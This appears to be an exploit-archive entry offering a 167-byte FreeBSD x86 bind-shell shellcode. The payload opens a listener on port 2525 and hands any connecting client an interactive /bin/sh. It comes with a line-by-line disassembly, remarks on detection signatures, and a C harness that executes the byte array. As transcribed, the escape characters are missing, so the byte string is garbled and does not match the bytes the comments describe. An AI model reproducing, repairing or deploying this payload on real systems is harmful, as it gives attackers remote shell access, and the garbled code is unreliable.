# Title : bds/x86-bindshell on port 2525 shellcode - 167 bytes
# Published : 2010-08-25
# Author :
==================================================
bds/x86-bindshell on port 2525 shellcode 167 bytes
==================================================
/*
-------------- bds/x86-bindshell on port 2525 167 bytes -------------------------
* AUTHOR : beosroot
* OS : BSDx86 (Tested on FreeBSD)
* EMAIL : beosroot@hotmail.fr
beosroot@null.net
* GR33TZ To : joseph-h, str0ke, MHIDO55,.....
*/
/*
 * Byte string of the bind-shell payload, with a per-line disassembly.
 * Structure as read from the disassembly (FreeBSD i386 syscall numbers
 * are loaded into %eax before each int $0x80): socket (0x61), bind (0x68),
 * listen (0x6a), accept (0x1e), close (0x06), dup2 x3 (0x5a), execve (0x3b).
 * The immediate 0xdd090210 is the sockaddr_in header: sin_len 0x10,
 * sin_family 2 (AF_INET), sin_port 0x09dd = 2525 in network byte order.
 * That constant, the syscall-number sequence and the "/bin/sh" / "-i"
 * string pushes are what a detection signature for this payload keys on.
 * NOTE(review): as transcribed on this page the escape prefix is absent
 * from every element, so the literal holds printable text rather than the
 * bytes the comments describe.
 */
const char shellcode[] =
"x6ax00" // push $0x0            -- protocol
"x6ax01" // push $0x1            -- SOCK_STREAM
"x6ax02" // push $0x2            -- AF_INET
"x50" // push %eax               -- dummy return-address slot (BSD convention)
"x6ax61" // push $0x61
"x58" // pop %eax
"xcdx80" // int $0x80            -- syscall 0x61: socket()
"x50" // push %eax               -- save listening socket fd
"x6ax00" // push $0x0
"x6ax00" // push $0x0
"x6ax00" // push $0x0
"x6ax00" // push $0x0            -- sin_zero / sin_addr = INADDR_ANY
"x68x10x02x09xdd" // push $0xdd090210 -- sin_len, AF_INET, port 2525 (0x09dd)
"x89xe0" // mov %esp,%eax        -- %eax = &sockaddr_in
"x6ax10" // push $0x10           -- addrlen
"x50" // push %eax               -- addr
"xffx74x24x1c" // pushl 0x1c(%esp) -- saved socket fd
"x50" // push %eax               -- dummy slot
"x6ax68" // push $0x68
"x58" // pop %eax
"xcdx80" // int $0x80            -- syscall 0x68: bind()
"x6ax01" // push $0x1            -- backlog
"xffx74x24x28" // pushl 0x28(%esp) -- saved socket fd
"x50" // push %eax               -- dummy slot
"x6ax6a" // push $0x6a
"x58" // pop %eax
"xcdx80" // int $0x80            -- syscall 0x6a: listen()
"x83xecx10" // sub $0x10,%esp    -- room for the peer sockaddr
"x6ax10" // push $0x10           -- addrlen value
"x8dx44x24x04" // lea 0x4(%esp),%eax -- %eax = &peer sockaddr
"x89xe1" // mov %esp,%ecx        -- %ecx = &addrlen
"x51" // push %ecx
"x50" // push %eax
"xffx74x24x4c" // pushl 0x4c(%esp) -- saved socket fd
"x50" // push %eax               -- dummy slot
"x6ax1e" // push $0x1e
"x58" // pop %eax
"xcdx80" // int $0x80            -- syscall 0x1e: accept()
"x50" // push %eax               -- save accepted (client) fd
"xffx74x24x58" // pushl 0x58(%esp) -- listening socket fd
"x50" // push %eax               -- dummy slot
"x6ax06" // push $0x6
"x58" // pop %eax
"xcdx80" // int $0x80            -- syscall 0x06: close() listening socket
"x6ax00" // push $0x0            -- new fd 0 (stdin)
"xffx74x24x0c" // pushl 0xc(%esp) -- client fd
"x50" // push %eax               -- dummy slot
"x6ax5a" // push $0x5a
"x58" // pop %eax
"xcdx80" // int $0x80            -- syscall 0x5a: dup2()
"x6ax01" // push $0x1            -- new fd 1 (stdout)
"xffx74x24x18" // pushl 0x18(%esp) -- client fd
"x50" // push %eax               -- dummy slot
"x6ax5a" // push $0x5a
"x58" // pop %eax
"xcdx80" // int $0x80            -- syscall 0x5a: dup2()
"x6ax02" // push $0x2            -- new fd 2 (stderr)
"xffx74x24x24" // pushl 0x24(%esp) -- client fd
"x50" // push %eax               -- dummy slot
"x6ax5a" // push $0x5a
"x58" // pop %eax
"xcdx80" // int $0x80            -- syscall 0x5a: dup2()
"x68x73x68x00x00" // push $0x6873     -- "sh\0\0"
"x89xe0" // mov %esp,%eax        -- %eax = "sh"
"x68x2dx69x00x00" // push $0x692d     -- "-i\0\0"
"x89xe1" // mov %esp,%ecx        -- %ecx = "-i"
"x6ax00" // push $0x0            -- argv terminator
"x51" // push %ecx               -- argv[1] = "-i"
"x50" // push %eax               -- argv[0] = "sh"
"x68x2fx73x68x00" // push $0x68732f   -- "/sh\0"
"x68x2fx62x69x6e" // push $0x6e69622f -- "/bin"
"x89xe0" // mov %esp,%eax        -- %eax = "/bin/sh"
"x8dx4cx24x08" // lea 0x8(%esp),%ecx -- %ecx = argv
"x6ax00" // push $0x0            -- envp = NULL
"x51" // push %ecx               -- argv
"x50" // push %eax               -- path
"x50" // push %eax               -- dummy slot
"x6ax3b" // push $0x3b
"x58" // pop %eax
"xcdx80"; // int $0x80           -- syscall 0x3b: execve()
// Harness that branches into the byte array above.
// `hell` is assigned but never used. Casting a const char array to a
// function pointer is undefined behavior in C; because the array is const
// it is placed in read-only data, which NX / W^X enforcement marks
// non-executable, so under that mitigation this harness faults instead of
// running. NOTE(review): `main()` with an empty parameter list is an
// old-style declaration; `int main(void)` is the conforming form.
int main() {
void (*hell)() = (void *)shellcode;
return (*(int(*)())shellcode)();
}
// the end o.O